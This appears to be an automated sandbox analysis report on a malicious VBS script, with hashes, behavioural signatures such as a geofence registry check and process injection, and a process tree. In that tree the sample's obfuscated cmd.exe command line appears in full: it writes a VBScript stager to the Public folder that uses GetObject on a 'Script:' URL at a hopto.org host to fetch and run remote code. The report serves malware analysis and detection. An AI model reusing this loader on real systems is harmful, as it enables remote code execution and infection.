Analysis
- max time kernel: 146s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-es
- submitted: 23-06-2022 14:52
- Static task: static1
- Behavioral task behavioral1: Sample 27.FICH_33O3LcBJBPsZDE6v.vbs; Resource win7-20220414-es
- Behavioral task behavioral2: Sample 27.FICH_33O3LcBJBPsZDE6v.vbs; Resource win10v2004-20220414-es
- Behavioral task behavioral3: Sample _.exe; Resource win7-20220414-es
General
- Target: 27.FICH_33O3LcBJBPsZDE6v.vbs
- Size: 7KB
- MD5: 25926cb2b53f3be53b0999621d1f1ccf
- SHA1: 9a073d7bd4b2f730f157f4612551504d16607256
- SHA256: 665b376283df9d5e962860cc1d6cc2ec05157afff65d44b6d9ff64d8b6393941
- SHA512: 8542f4c0815e8f161c4dc2151252454fc2dcc86da0a3160724f54d702d3ea99805be006d5bfdde65f68f3aba6556892d735515824a3fdf24f9de0dd05dc469bd
Malware Config
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes:
  flow | pid  | process
  4    | 4336 | WScript.exe
  10   | 4336 | WScript.exe
  16   | 4336 | WScript.exe
  27   | 4336 | WScript.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
  description       | ioc                                                                                                         | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation        | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation        | cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (1 IoCs)
  Processes:
  description | ioc                                                                                  | process
  Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings | cmd.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
  description                       | pid  | process     | target process
  PID 4536 wrote to memory of 2216  | 4536 | WScript.exe | cmd.exe
  PID 4536 wrote to memory of 2216  | 4536 | WScript.exe | cmd.exe
  PID 2216 wrote to memory of 1700  | 2216 | cmd.exe     | cmd.exe
  PID 2216 wrote to memory of 1700  | 2216 | cmd.exe     | cmd.exe
  PID 2216 wrote to memory of 3744  | 2216 | cmd.exe     | cmd.exe
  PID 2216 wrote to memory of 3744  | 2216 | cmd.exe     | cmd.exe
  PID 3744 wrote to memory of 1076  | 3744 | cmd.exe     | cmd.exe
  PID 3744 wrote to memory of 1076  | 3744 | cmd.exe     | cmd.exe
  PID 1076 wrote to memory of 4336  | 1076 | cmd.exe     | WScript.exe
  PID 1076 wrote to memory of 4336  | 1076 | cmd.exe     | WScript.exe
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27.FICH_33O3LcBJBPsZDE6v.vbs"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmD ^/V/D/c EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function > nul > %Public%\^L8DPGAESQ5.vbs |^start cMd /c start %Public%\^L8DPGAESQ5.vbs
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /S /D /c" EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function 1>C:\Users\Public\L8DPGAESQ5.vbs"
      3. C:\Windows\system32\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /S /D /c" start cMd /c start C:\Users\Public\L8DPGAESQ5.vbs"
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\cmd.exe
            Command line: cMd /c start C:\Users\Public\L8DPGAESQ5.vbs
            - Checks computer location settings
            - Modifies registry class
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\System32\WScript.exe
               Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\L8DPGAESQ5.vbs"
               - Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\L8DPGAESQ5.vbs
  Filesize: 275B
  MD5: 6bac93f3f5d256c436d31e9496f33353
  SHA1: 906d675da017b53b3051cca5bf270655d68bc358
  SHA256: f7c07264ac5931edc61c2bf838cffba41e119d9780876904c1c2d817ce5810c6
  SHA512: ab576653b6030eec23d241a37805bad26cc13b38a0bf8957bbea0c010fd910e15ceece6fd4bacc784aadc1f8b1ed55c64b93ada35bcdfdb98d16afeb5b7c4804
- memory/1076-133-0x0000000000000000-mapping.dmp
- memory/1700-131-0x0000000000000000-mapping.dmp
- memory/2216-130-0x0000000000000000-mapping.dmp
- memory/3744-132-0x0000000000000000-mapping.dmp
- memory/4336-135-0x0000000000000000-mapping.dmp